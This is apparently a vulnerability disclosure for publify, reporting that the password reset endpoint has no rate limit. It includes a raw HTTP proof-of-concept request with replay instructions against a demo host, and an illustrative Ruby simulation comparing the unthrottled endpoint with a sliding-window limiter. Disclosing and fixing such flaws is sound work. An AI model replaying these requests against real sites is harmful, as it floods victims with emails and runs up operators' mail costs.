Insufficient Granularity of Access Control in publify/publify
Oct 12th 2021
There is no rate limit on the password reset endpoint (POST /users/password), so an attacker can trigger an unlimited number of password reset emails to any email address that belongs to an existing account.
Proof of Concept
There is no rate limit on users/password, so an attacker can send unlimited password reset emails to any victim address that has an account.
POST /users/password HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=bcc4763a5e705ab2f900361126dc1a92
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo-publify.herokuapp.com/users/password/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Origin: https://demo-publify.herokuapp.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

utf8=%E2%9C%93&authenticity_token=aMSmWPPXrTwPfgTcEeKEqEKfpcHJiggrpOvwt5b9MyFHfGws3tJQDfbCb9u4nQY98rXHzFnUGwUSVtbxVfLD3A%3D%3D&user%5Bemail%5D=admin%40gmail.com&commit=Send+me+reset+password+instructions
Set the user[email] parameter to the victim's address and resend this request as many times as you like; nothing throttles it, so the victim receives a password reset email for every request. The authenticity_token is bound to the _publify_blog_session cookie, so replay the request with the same cookie (or fetch a fresh token from /users/password/new for a new session).
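The replay described above, and the throttle that would stop it, as an added example (this is illustrative code, not publify's own): it models the /users/password handler, replays the PoC request 50 times from one source address, and compares the unthrottled endpoint with one placed behind a sliding-window limiter keyed on the client IP and on the target address. All class and method names, the limit of 3 requests per hour, the IP 203.0.113.7 and the victim address are assumptions made for the example.

```ruby
# Added example, not publify code. Simulates POST /users/password with and
# without a per-IP / per-e-mail sliding-window limiter. Names and limits are
# assumptions for illustration.

# Counts how many reset e-mails the "mailer" sent per address.
class FakeMailer
  attr_reader :sent
  def initialize
    @sent = Hash.new(0)
  end

  def send_reset(email)
    @sent[email] += 1
  end
end

# Sliding-window limiter: at most `limit` events per `period` seconds per key.
class SlidingWindowLimiter
  def initialize(limit:, period:)
    @limit = limit
    @period = period
    @events = Hash.new { |h, k| h[k] = [] }
  end

  # Returns true and records the event if it is within the limit, false otherwise.
  def allow?(key, now = Time.now.to_f)
    window = @events[key]
    window.reject! { |t| t <= now - @period } # forget events outside the window
    return false if window.size >= @limit

    window << now
    true
  end
end

# Handler for the reset endpoint. With limiter: nil it behaves like the
# vulnerable endpoint: every request results in a mail being sent.
class PasswordResetHandler
  def initialize(mailer, limiter: nil)
    @mailer = mailer
    @limiter = limiter
  end

  # params mirrors the urlencoded PoC body: user[email]=<victim>
  def call(ip, params, now = Time.now.to_f)
    email = params.fetch('user').fetch('email').strip.downcase
    if @limiter
      # Check the source IP first; the e-mail bucket is only consumed if the IP
      # bucket allowed the request. The response is the same as on success so
      # the attacker cannot tell which addresses exist.
      return :throttled unless @limiter.allow?("ip:#{ip}", now) &&
                               @limiter.allow?("email:#{email}", now)
    end
    @mailer.send_reset(email)
    :sent
  end
end

# Replays the PoC request `count` times from one source IP, 10 ms apart
# (constructed timing), and returns how many were sent vs throttled.
def replay(handler, count:, ip: '203.0.113.7', victim: 'admin@gmail.com')
  params = { 'user' => { 'email' => victim } } # constructed, same shape as the PoC body
  t0 = Time.now.to_f
  Array.new(count) { |i| handler.call(ip, params, t0 + i * 0.01) }.tally
end

# Runs the replay against the vulnerable handler and the throttled one.
def demo(count = 50)
  vulnerable = PasswordResetHandler.new(FakeMailer.new)
  limiter = SlidingWindowLimiter.new(limit: 3, period: 3600)
  patched = PasswordResetHandler.new(FakeMailer.new, limiter: limiter)
  {
    unthrottled: replay(vulnerable, count: count),
    throttled: replay(patched, count: count)
  }
end

p demo if __FILE__ == $PROGRAM_NAME
```

Keying on the target address as well as the source IP matters: a per-IP limit alone is trivially bypassed from a botnet or a pool of cloud addresses, while a per-address cap bounds what any one victim's inbox (and the operator's mail quota) can receive regardless of how many attackers participate.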
An attacker can therefore send an unlimited number of emails to any address that has an account. Many email service providers cap outgoing mail (for example, 1000 emails per month) and charge extra once that cap is exceeded, so this attack can push the site over its quota and cost the operator money, while also flooding the victim's inbox.